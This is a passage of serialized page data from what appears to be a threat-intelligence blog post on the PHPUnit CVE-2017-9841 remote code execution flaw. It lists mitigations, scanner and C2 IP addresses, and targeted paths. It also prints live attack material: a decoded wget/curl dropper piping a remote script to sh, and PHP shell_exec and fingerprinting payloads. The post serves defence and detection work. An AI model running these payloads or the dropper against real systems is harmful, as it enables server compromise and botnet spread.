403;\n",[1373,1851,1853],{"class":1375,"line":1852},4,[1373,1854,1855],{},"}\n",[1823,1857],{},[295,1859,1860],{},"Apache (.htaccess or server config):",[1354,1862,1866],{"className":1863,"code":1864,"language":1865,"meta":219,"style":219},"language-apache shiki shiki-themes material-theme-lighter github-light github-dark monokai","\u003CDirectoryMatch \"vendor\">\n Require all denied\n\u003C\u002FDirectoryMatch>\n","apache",[886,1867,1868,1873,1878],{"__ignoreMap":219},[1373,1869,1870],{"class":1375,"line":1376},[1373,1871,1872],{},"\u003CDirectoryMatch \"vendor\">\n",[1373,1874,1875],{"class":1375,"line":220},[1373,1876,1877],{}," Require all denied\n",[1373,1879,1880],{"class":1375,"line":1266},[1373,1881,1882],{},"\u003C\u002FDirectoryMatch>\n",[25,1884,1885,1888],{},[295,1886,1887],{},"Update PHPUnit."," If you need PHPUnit in your environment, use version 4.8.28+ or 5.6.3+, where this file was removed.",[25,1890,1891,1894,1895,1897],{},[295,1892,1893],{},"Check for indicators of compromise."," If the file was present and accessible, review access logs for POST requests to ",[886,1896,1318],{},". Any 200-series responses warrant a full incident response investigation.",[1308,1899],{},[61,1901,1903],{"id":1902},"conclusion","Conclusion",[18,1905,1906,1907,1910],{},"CVE-2017-9841 is a case study in the persistence of simple vulnerabilities. There's nothing technically sophisticated about it, a PHP ",[886,1908,1909],{},"eval()"," call on user-supplied input is about as elementary a vulnerability class as exists. But elementary vulnerabilities in widely-deployed software, packaged inside dependency managers and exposed by deployment misconfigurations, have an extraordinary shelf life.",[18,1912,1913],{},"The VulnCheck Canary data makes one thing clear: attackers are still finding and exploiting this. The scanning infrastructure is active, organized, and running multi-exploit campaigns that treat CVE-2017-9841 as a reliable component of a web application compromise playbook alongside much newer vulnerabilities.",[18,1915,1916],{},"After nine years, the fix is the same as it was in 2017: don't ship your test dependencies to production, and don't web-serve your vendor directory. The attackers are counting on the fact that many teams still haven't gotten there.",[1308,1918],{},[1920,1921,1923],"h1",{"id":1922},"iocs-below","IOCs Below",[1925,1926,1927],"blockquote",{},[18,1928,1929,1930,1933],{},"⚠️ ",[295,1931,1932],{},"Warning:"," All IPs and domains below have been observed conducting active exploitation attempts against CVE-2017-9841. Block or alert on these indicators at your perimeter, WAF, and SIEM. Interact with C2 infrastructure at you own risk.",[1308,1935],{},[61,1937,1939],{"id":1938},"scanner-ips","Scanner IPs",[18,1941,1942],{},"IPs directly observed sending exploitation payloads to VulnCheck Canaries.",[307,1944,1945,1962],{},[310,1946,1947],{},[313,1948,1949,1952,1954,1957,1959],{},[316,1950,1951],{},"IP Address",[316,1953,1461],{},[316,1955,1956],{},"AS Name",[316,1958,1464],{},[316,1960,1961],{},"Observed Activity",[336,1963,1964,1982,2000,2019,2042],{},[313,1965,1966,1970,1973,1976,1979],{},[341,1967,1968],{},[886,1969,1474],{},[341,1971,1972],{},"AS25369",[341,1974,1975],{},"Hydra Communications Ltd",[341,1977,1978],{},"🇬🇧 United Kingdom",[341,1980,1981],{},"Mass scanner — PHPUnit RCE + ThinkPHP RCE + PHP CGI + Apache path traversal",[313,1983,1984,1988,1991,1994,1997],{},[341,1985,1986],{},[886,1987,1488],{},[341,1989,1990],{},"AS8560",[341,1992,1993],{},"IONOS SE",[341,1995,1996],{},"🇺🇸 United States",[341,1998,1999],{},"PHPUnit RCE scanner — exhaustive path enumeration",[313,2001,2002,2007,2010,2013,2016],{},[341,2003,2004],{},[886,2005,2006],{},"116.99.50.13",[341,2008,2009],{},"AS7552",[341,2011,2012],{},"Viettel Group",[341,2014,2015],{},"🇻🇳 Vietnam",[341,2017,2018],{},"PHPUnit RCE — shell_exec + encoded C2 dropper",[313,2020,2021,2026,2029,2032,2035],{},[341,2022,2023],{},[886,2024,2025],{},"167.86.88.40",[341,2027,2028],{},"AS51167",[341,2030,2031],{},"Contabo GmbH",[341,2033,2034],{},"🇫🇷 France",[341,2036,2037,2038,2041],{},"PHPUnit RCE — wget\u002Fcurl C2 downloader (",[886,2039,2040],{},"apache.selfrep"," tag)",[313,2043,2044,2049,2052,2055,2058],{},[341,2045,2046],{},[886,2047,2048],{},"83.168.88.41",[341,2050,2051],{},"AS35179",[341,2053,2054],{},"Korbank S.A.",[341,2056,2057],{},"🇵🇱 Poland",[341,2059,2037,2060,2041],{},[886,2061,2040],{},[18,2063,2064,2067,2068,1246,2071,1246,2074,1246,2077,1246,2080,1246,2083,1246,2086,1246,2089,1246,2092,1246,2095,1246,2098,2101,2102,2105],{},[295,2065,2066],{},"Note on Cloudflare IPs:"," Several Cloudflare egress IPs (",[886,2069,2070],{},"104.23.225.154",[886,2072,2073],{},"104.23.225.155",[886,2075,2076],{},"104.23.229.65",[886,2078,2079],{},"141.101.68.221",[886,2081,2082],{},"141.101.97.102",[886,2084,2085],{},"172.68.151.20",[886,2087,2088],{},"172.68.151.21",[886,2090,2091],{},"172.71.122.170",[886,2093,2094],{},"172.71.126.163",[886,2096,2097],{},"172.71.135.24",[886,2099,2100],{},"172.71.232.146",") were observed making ",[886,2103,2104],{},"curl\u002F8.7.1"," requests to PHPUnit paths. These are likely Cloudflare Workers proxying attacker traffic. Block the specific paths rather than the IPs for these.",[1308,2107],{},[61,2109,2111],{"id":2110},"c2-payload-delivery-infrastructure","C2 \u002F Payload Delivery Infrastructure",[18,2113,2114],{},"IPs and URLs found within exploitation payloads — these are attacker-controlled infrastructure used to deliver second-stage shells.",[307,2116,2117,2129],{},[310,2118,2119],{},[313,2120,2121,2124,2127],{},[316,2122,2123],{},"Type",[316,2125,2126],{},"Indicator",[316,2128,334],{},[336,2130,2131,2143,2155,2166],{},[313,2132,2133,2136,2140],{},[341,2134,2135],{},"IP",[341,2137,2138],{},[886,2139,1758],{},[341,2141,2142],{},"Primary C2\u002Fdropper host — observed in payloads from multiple source IPs",[313,2144,2145,2147,2152],{},[341,2146,2135],{},[341,2148,2149],{},[886,2150,2151],{},"185.177.72.51",[341,2153,2154],{},"Secondary C2 IP — observed in payload decode",[313,2156,2157,2159,2164],{},[341,2158,2135],{},[341,2160,2161],{},[886,2162,2163],{},"185.177.72.68",[341,2165,2154],{},[313,2167,2168,2171,2175],{},[341,2169,2170],{},"URL",[341,2172,2173],{},[886,2174,1561],{},[341,2176,2177,2178,2180,2181,2183,2184],{},"Shell download endpoint — fetched via ",[886,2179,1553],{},"\u002F",[886,2182,1557],{}," and piped to ",[886,2185,2186],{},"sh",[18,2188,2189,2192],{},[295,2190,2191],{},"Decoded dropper command"," (base64 payload observed in live exploitation):",[1354,2194,2198],{"className":2195,"code":2196,"language":2197,"meta":219,"style":219},"language-bash shiki shiki-themes material-theme-lighter github-light github-dark monokai","(wget --no-check-certificate -qO- https:\u002F\u002F125.135.169.171\u002Fsh || curl -sk https:\u002F\u002F125.135.169.171\u002Fsh) | sh -s cve_2024_4577.selfrep\n","bash",[886,2199,2200],{"__ignoreMap":219},[1373,2201,2202,2204,2207,2211,2214,2217,2220,2223,2226,2228,2231,2234,2237,2240],{"class":1375,"line":1376},[1373,2203,1384],{"class":1383},[1373,2205,1553],{"class":2206},"sR7ES",[1373,2208,2210],{"class":2209},"sFhLe"," --no-check-certificate",[1373,2212,2213],{"class":2209}," -qO-",[1373,2215,2216],{"class":1391}," https:\u002F\u002F125.135.169.171\u002Fsh",[1373,2218,2219],{"class":1397}," ||",[1373,2221,2222],{"class":2206}," curl",[1373,2224,2225],{"class":2209}," -sk",[1373,2227,2216],{"class":1391},[1373,2229,2230],{"class":1383},")",[1373,2232,2233],{"class":1397}," |",[1373,2235,2236],{"class":2206}," sh",[1373,2238,2239],{"class":2209}," -s",[1373,2241,2242],{"class":1391}," cve_2024_4577.selfrep\n",[18,2244,2245,2246,2249],{},"The ",[886,2247,2248],{},"cve_2024_4577.selfrep"," argument tag indicates this dropper self-replicates and is part of a broader campaign simultaneously exploiting CVE-2024-4577 (PHP CGI RCE).",[1308,2251],{},[61,2253,2255],{"id":2254},"http-indicators","HTTP Indicators",[993,2257,2259],{"id":2258},"user-agents","User Agents",[307,2261,2262,2271],{},[310,2263,2264],{},[313,2265,2266,2269],{},[316,2267,2268],{},"User Agent",[316,2270,334],{},[336,2272,2273,2282],{},[313,2274,2275,2279],{},[341,2276,2277],{},[886,2278,1751],{},[341,2280,2281],{},"Primary scanner UA — observed in 90%+ of PHPUnit hits",[313,2283,2284,2288],{},[341,2285,2286],{},[886,2287,2104],{},[341,2289,2290],{},"Secondary scanner UA — associated with Cloudflare-proxied requests",[993,2292,2294],{"id":2293},"request-method-body-patterns","Request Method & Body Patterns",[18,2296,2297,2298,2301],{},"All exploitation attempts use ",[295,2299,2300],{},"HTTP POST"," to the target paths with PHP code in the request body.",[18,2303,2304,2307],{},[295,2305,2306],{},"Fingerprinting payloads"," (used to confirm RCE before deploying full dropper):",[1354,2309,2312],{"className":2310,"code":2311,"language":1359,"meta":219},[1357],"\u003C?php echo(md5(\"Hello PHPUnit\"));\n",[886,2313,2311],{"__ignoreMap":219},[1354,2315,2317],{"className":1367,"code":2316,"language":1369,"meta":219,"style":219},"\u003C?php echo md5('phpunit_rce'); ?>\n",[886,2318,2319],{"__ignoreMap":219},[1373,2320,2321,2324,2327,2330,2333,2335,2337,2340,2342,2345],{"class":1375,"line":1376},[1373,2322,2323],{"class":1397},"\u003C?",[1373,2325,1369],{"class":2326},"sQeA1",[1373,2328,2329],{"class":1379}," echo",[1373,2331,2332],{"class":1379}," md5",[1373,2334,1384],{"class":1383},[1373,2336,1388],{"class":1387},[1373,2338,2339],{"class":1391},"phpunit_rce",[1373,2341,1388],{"class":1387},[1373,2343,2344],{"class":1383},");",[1373,2346,2347],{"class":1397}," ?>\n",[18,2349,2350],{},[295,2351,2352],{},"Shell execution payload pattern:",[1354,2354,2356],{"className":1367,"code":2355,"language":1369,"meta":219,"style":219},"\u003C?php shell_exec(base64_decode(\"\u003Cbase64_encoded_dropper>\")); echo(md5(\"Hello CVE-2024-4577\")); ?>\n",[886,2357,2358],{"__ignoreMap":219},[1373,2359,2360,2362,2364,2367,2369,2372,2374,2376,2379,2381,2384,2386,2388,2391,2393,2395,2398,2400,2402],{"class":1375,"line":1376},[1373,2361,2323],{"class":1397},[1373,2363,1369],{"class":2326},[1373,2365,2366],{"class":1379}," shell_exec",[1373,2368,1384],{"class":1383},[1373,2370,2371],{"class":1379},"base64_decode",[1373,2373,1384],{"class":1383},[1373,2375,183],{"class":1387},[1373,2377,2378],{"class":1391},"\u003Cbase64_encoded_dropper>",[1373,2380,183],{"class":1387},[1373,2382,2383],{"class":1383},"));",[1373,2385,2329],{"class":1379},[1373,2387,1384],{"class":1383},[1373,2389,2390],{"class":1379},"md5",[1373,2392,1384],{"class":1383},[1373,2394,183],{"class":1387},[1373,2396,2397],{"class":1391},"Hello CVE-2024-4577",[1373,2399,183],{"class":1387},[1373,2401,2383],{"class":1383},[1373,2403,2347],{"class":1397},[993,2405,2407],{"id":2406},"vulncheck-signature","VulnCheck Signature",[307,2409,2410,2420],{},[310,2411,2412],{},[313,2413,2414,2417],{},[316,2415,2416],{},"Signature ID",[316,2418,2419],{},"Signature Name",[336,2421,2422],{},[313,2423,2424,2429],{},[341,2425,2426],{},[886,2427,2428],{},"12700264",[341,2430,2431],{},[886,2432,1435],{},[1308,2434],{},[61,2436,2438],{"id":2437},"url-paths-targeted","URL Paths Targeted",[18,2440,2441],{},"All 30 unique paths observed in active scanning campaigns. Attackers enumerate all of these in a single session to find PHPUnit in non-standard installation locations.",[1354,2443,2446],{"className":2444,"code":2445,"language":1359,"meta":219},[1357],"\u002FV2\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fadmin\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapi\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapp\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fapps\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fbackup\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fblog\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fcms\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fcrm\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fdemo\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flaravel\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Flib\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fpanel\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fpublic\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Ftest\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Ftesting\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Ftests\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fvendor\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fvendor\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fworkspace\u002Fdrupal\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fws\u002Fec\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fws\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fwww\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fyii\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n\u002Fzend\u002Fvendor\u002Fphpunit\u002Fphpunit\u002Fsrc\u002FUtil\u002FPHP\u002Feval-stdin.php\n",[886,2447,2445],{"__ignoreMap":219},[1308,2449],{},[61,2451,2453],{"id":2452},"exploit-tools-public-resources","Exploit Tools & Public Resources",[18,2455,2456],{},"Public exploit tooling observed or tracked by VulnCheck for CVE-2017-9841. These are documented for defensive awareness.",[307,2458,2459,2473],{},[310,2460,2461],{},[313,2462,2463,2466,2469,2471],{},[316,2464,2465],{},"Tool \u002F Resource",[316,2467,2468],{},"Source",[316,2470,2123],{},[316,2472,334],{},[336,2474,2475,2492,2509,2524,2540,2556,2571,2587,2602,2617,2632,2649,2665,2681,2698,2716],{},[313,2476,2477,2483,2486,2489],{},[341,2478,2479],{},[47,2480,1680],{"href":2481,"rel":2482},"https:\u002F\u002Fgithub.com\u002FRandomRobbieBF\u002Fphpunit-brute",[51],[341,2484,2485],{},"GitHub",[341,2487,2488],{},"Mass scanner",[341,2490,2491],{},"Python-based brute-force scanner",[313,2493,2494,2501,2503,2506],{},[341,2495,2496],{},[47,2497,2500],{"href":2498,"rel":2499},"https:\u002F\u002Fgithub.com\u002Fludy-dev\u002FPHPUnit_eval-stdin_RCE",[51],"PHPUnit_eval-stdin_RCE",[341,2502,2485],{},[341,2504,2505],{},"PoC exploit",[341,2507,2508],{},"Python RCE script",[313,2510,2511,2517,2519,2521],{},[341,2512,2513],{},[47,2514,1683],{"href":2515,"rel":2516},"https:\u002F\u002Fgithub.com\u002Fincogbyte\u002Flaravel-phpunit-rce-masscaner",[51],[341,2518,2485],{},[341,2520,2488],{},[341,2522,2523],{},"Laravel-specific path enumeration",[313,2525,2526,2533,2535,2537],{},[341,2527,2528],{},[47,2529,2532],{"href":2530,"rel":2531},"https:\u002F\u002Fgithub.com\u002Fakr3ch\u002FCVE-2017-9841",[51],"CVE-2017-9841 (akr3ch)",[341,2534,2485],{},[341,2536,2505],{},[341,2538,2539],{},"Python",[313,2541,2542,2549,2551,2553],{},[341,2543,2544],{},[47,2545,2548],{"href":2546,"rel":2547},"https:\u002F\u002Fgithub.com\u002Fp1ckzi\u002FCVE-2017-9841",[51],"CVE-2017-9841 (p1ckzi)",[341,2550,2485],{},[341,2552,2505],{},[341,2554,2555],{},"Shell script",[313,2557,2558,2565,2567,2569],{},[341,2559,2560],{},[47,2561,2564],{"href":2562,"rel":2563},"https:\u002F\u002Fgithub.com\u002Fjax7sec\u002FCVE-2017-9841",[51],"CVE-2017-9841 (jax7sec)",[341,2566,2485],{},[341,2568,2505],{},[341,2570,2539],{},[313,2572,2573,2580,2582,2584],{},[341,2574,2575],{},[47,2576,2579],{"href":2577,"rel":2578},"https:\u002F\u002Fgithub.com\u002Fmileticluka1\u002Feval-stdin",[51],"eval-stdin (mileticluka1)",[341,2581,2485],{},[341,2583,2505],{},[341,2585,2586],{},"Ruby",[313,2588,2589,2596,2598,2600],{},[341,2590,2591],{},[47,2592,2595],{"href":2593,"rel":2594},"https:\u002F\u002Fgithub.com\u002Fdream434\u002FCVE-2017-9841",[51],"CVE-2017-9841 (dream434)",[341,2597,2485],{},[341,2599,2505],{},[341,2601,2539],{},[313,2603,2604,2611,2613,2615],{},[341,2605,2606],{},[47,2607,2610],{"href":2608,"rel":2609},"https:\u002F\u002Fgithub.com\u002FMrG3P5\u002FCVE-2017-9841",[51],"CVE-2017-9841 (MrG3P5)",[341,2612,2485],{},[341,2614,2505],{},[341,2616,2539],{},[313,2618,2619,2626,2628,2630],{},[341,2620,2621],{},[47,2622,2625],{"href":2623,"rel":2624},"https:\u002F\u002Fgithub.com\u002FChocapikk\u002FCVE-2017-9841",[51],"CVE-2017-9841 (Chocapikk)",[341,2627,2485],{},[341,2629,2505],{},[341,2631,2539],{},[313,2633,2634,2641,2643,2646],{},[341,2635,2636],{},[47,2637,2640],{"href":2638,"rel":2639},"https:\u002F\u002Fgithub.com\u002Fjoelindra\u002FArgus",[51],"Argus (joelindra)",[341,2642,2485],{},[341,2644,2645],{},"Multi-vuln scanner",[341,2647,2648],{},"CVE-2017-9841 module",[313,2650,2651,2658,2660,2662],{},[341,2652,2653],{},[47,2654,2657],{"href":2655,"rel":2656},"https:\u002F\u002Fgithub.com\u002Fdrcrypterdotru\u002FPHPUnit-GoScan",[51],"PHPUnit-GoScan (drcrypterdotru)",[341,2659,2485],{},[341,2661,2488],{},[341,2663,2664],{},"Go-based, added Aug 2025",[313,2666,2667,2674,2676,2678],{},[341,2668,2669],{},[47,2670,2673],{"href":2671,"rel":2672},"https:\u002F\u002Fgithub.com\u002FHabibullah1101\u002FPHPUnit-GoScan",[51],"PHPUnit-GoScan (Habibullah1101)",[341,2675,2485],{},[341,2677,2488],{},[341,2679,2680],{},"Go-based fork, added Sep 2025",[313,2682,2683,2690,2693,2695],{},[341,2684,2685],{},[47,2686,2689],{"href":2687,"rel":2688},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F50702",[51],"ExploitDB #50702",[341,2691,2692],{},"Exploit-DB",[341,2694,2505],{},[341,2696,2697],{},"PHPUnit 4.8.28 RCE (unauthenticated)",[313,2699,2700,2707,2710,2713],{},[341,2701,2702],{},[47,2703,2706],{"href":2704,"rel":2705},"https:\u002F\u002Fapi.vulncheck.com\u002Fv3\u002Findex\u002Finitial-access?cve=CVE-2017-9841",[51],"VulnCheck Initial Access",[341,2708,2709],{},"VulnCheck",[341,2711,2712],{},"Weaponized",[341,2714,2715],{},"Commercially available weaponized module (April 2024+)",[313,2717,2718,2725,2728,2730],{},[341,2719,2720],{},[47,2721,2724],{"href":2722,"rel":2723},"https:\u002F\u002Fraw.githubusercontent.com\u002Fprojectdiscovery\u002Fnuclei-templates\u002Fmain\u002Fhttp\u002Fcves\u002F2017\u002FCVE-2017-9841.yaml",[51],"Nuclei Template",[341,2726,2727],{},"ProjectDiscovery",[341,2729,1710],{},[341,2731,2732],{},"YAML detection template",[1308,2734],{},[61,2736,2738],{"id":2737},"cve-metadata-intelligence-summary","CVE Metadata & Intelligence Summary",[307,2740,2741,2751],{},[310,2742,2743],{},[313,2744,2745,2748],{},[316,2746,2747],{},"Field",[316,2749,2750],{},"Value",[336,2752,2753,2761,2769,2777,2787,2795,2806,2814,2822,2830,2838],{},[313,2754,2755,2758],{},[341,2756,2757],{},"CVE ID",[341,2759,2760],{},"CVE-2017-9841",[313,2762,2763,2766],{},[341,2764,2765],{},"Affected Software",[341,2767,2768],{},"PHPUnit \u003C 4.8.28, PHPUnit 5.x \u003C 5.6.3",[313,2770,2771,2774],{},[341,2772,2773],{},"Vulnerability Type",[341,2775,2776],{},"Remote Code Execution (Unauthenticated)",[313,2778,2779,2782],{},[341,2780,2781],{},"Attack Vector",[341,2783,2784,2785],{},"Network — HTTP POST to exposed ",[886,2786,1318],{},[313,2788,2789,2792],{},[341,2790,2791],{},"CVSS Score",[341,2793,2794],{},"9.8 Critical",[313,2796,2797,2800],{},[341,2798,2799],{},"EPSS Score",[341,2801,2802,2805],{},[295,2803,2804],{},"94.21%"," (99.9th percentile)",[313,2807,2808,2811],{},[341,2809,2810],{},"NVD Published",[341,2812,2813],{},"June 27, 2017",[313,2815,2816,2819],{},[341,2817,2818],{},"First Exploit Published",[341,2820,2821],{},"May 18, 2020",[313,2823,2824,2827],{},[341,2825,2826],{},"First Botnet Activity",[341,2828,2829],{},"November 22, 2020",[313,2831,2832,2835],{},[341,2833,2834],{},"Total Public Exploits (VulnCheck)",[341,2836,2837],{},"18",[313,2839,2840,2843],{},[341,2841,2842],{},"Tracked Botnets (VulnCheck)",[341,2844,401],{},[1308,2846],{},[61,2848,2850],{"id":2849},"references","References",[22,2852,2853,2860,2867,2873,2880],{},[25,2854,2855],{},[47,2856,2859],{"href":2857,"rel":2858},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2017-9841",[51],"NVD — CVE-2017-9841",[25,2861,2862],{},[47,2863,2866],{"href":2864,"rel":2865},"https:\u002F\u002Fwww.cisa.gov\u002Fknown-exploited-vulnerabilities-catalog",[51],"CISA KEV — CVE-2017-9841",[25,2868,2869],{},[47,2870,1233],{"href":2871,"rel":2872},"https:\u002F\u002Fvulncheck.com\u002Fkev",[51],[25,2874,2875],{},[47,2876,2879],{"href":2877,"rel":2878},"https:\u002F\u002Fvulncheck.com\u002Fbrowse\u002Fcve\u002FCVE-2017-9841",[51],"VulnCheck Exploit Intelligence — CVE-2017-9841",[25,2881,2882],{},[47,2883,2886],{"href":2884,"rel":2885},"https:\u002F\u002Fblog.qualys.com\u002Fvulnerabilities-threat-research\u002F2025\u002F10\u002F30\u002Fwhat-security-teams-need-to-know-as-php-and-iot-exploits-surge",[51],"Qualys Blog — PHP and IoT Exploits Surge (Oct 2025)",[1308,2888],{},[61,2890,202],{"id":201},[18,2892,205],{},[18,2894,208],{},[18,2896,211,2897,217],{},[47,2898,216],{"href":214,"rel":2899},[51],[2901,2902,2903],"style",{},"html pre.shiki code .sMLJd, html code.shiki .sMLJd{--shiki-light:#6182B8;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#66D9EF}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html pre.shiki code .sR7ES, html code.shiki .sR7ES{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .sFhLe, html code.shiki .sFhLe{--shiki-light:#91B859;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}html pre.shiki code .sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":2905},[2906,2907,2912,2918,2919,2920,2921,2922,2923,2924,2929,2930,2931,2932,2933],{"id":1338,"depth":220,"text":1339},{"id":1424,"depth":220,"text":1425,"children":2908},[2909,2910,2911],{"id":1445,"depth":1266,"text":1446},{"id":1518,"depth":1266,"text":1519},{"id":1538,"depth":1266,"text":1539},{"id":1593,"depth":220,"text":1594,"children":2913},[2914,2915,2916,2917],{"id":1607,"depth":1266,"text":1608},{"id":1648,"depth":1266,"text":1649},{"id":1662,"depth":1266,"text":1663},{"id":1669,"depth":1266,"text":1670},{"id":1692,"depth":220,"text":1693},{"id":1709,"depth":220,"text":1710},{"id":1781,"depth":220,"text":1782},{"id":1902,"depth":220,"text":1903},{"id":1938,"depth":220,"text":1939},{"id":2110,"depth":220,"text":2111},{"id":2254,"depth":220,"text":2255,"children":2925},[2926,2927,2928],{"id":2258,"depth":1266,"text":2259},{"id":2293,"depth":1266,"text":2294},{"id":2406,"depth":1266,"text":2407},{"id":2437,"depth":220,"text":2438},{"id":2452,"depth":220,"text":2453},{"id":2737,"depth":220,"text":2738},{"id":2849,"depth":220,"text":2850},{"id":201,"depth":220,"text":202},"2026-05-19T09:00:00-05:00","CVE-2017-9841 is still a primary exploit path for several botnets. What is old is still new in the eyes of cybercrime.",{},"\u002Fblog\u002Fcve-2017-9841",{"title":1285,"description":2935},"blog\u002Fcve-2017-9841",[242,2941,2942,2943],"canary","initial access","cve-2017-9841","Dg6GxePTJ6NRnDNutqu-aBZe8YoZuZLDuP3fOhvCLSY",{"id":2946,"title":1225,"articles":2947,"authors":2961,"body":2963,"date":3243,"description":233,"extension":234,"image":7,"link":7,"meta":3244,"navigation":237,"path":3246,"seo":3247,"series":7,"stem":3248,"subtype":7,"tags":3249,"__hash__":3250},"blog\u002Fblog\u002Fai-assisted-vulnerability-discovery.md",[2948,2953,2957],{"title":2949,"source":2950,"link":2951,"date":2952},"Over 10 threat groups are now feasting on your Cisco SD-WAN","The Stack","https:\u002F\u002Fwww.thestack.technology\u002Fover-10-threat-groups-are-now-feasting-on-your-cisco-sd-wan\u002F","2026-05-15",{"title":2954,"source":2955,"link":2956,"date":2952},"AI revolution? CVE disclosures jump by up to 500% for some vendors","Cyberdaily.AU","https:\u002F\u002Fwww.cyberdaily.au\u002Fsecurity\u002F13600-ai-revolution-cve-disclosures-jump-by-up-to-500-per-cent-for-some-vendors",{"title":2958,"source":2950,"link":2959,"date":2960},"UK regulators sound alarm over frontier AI 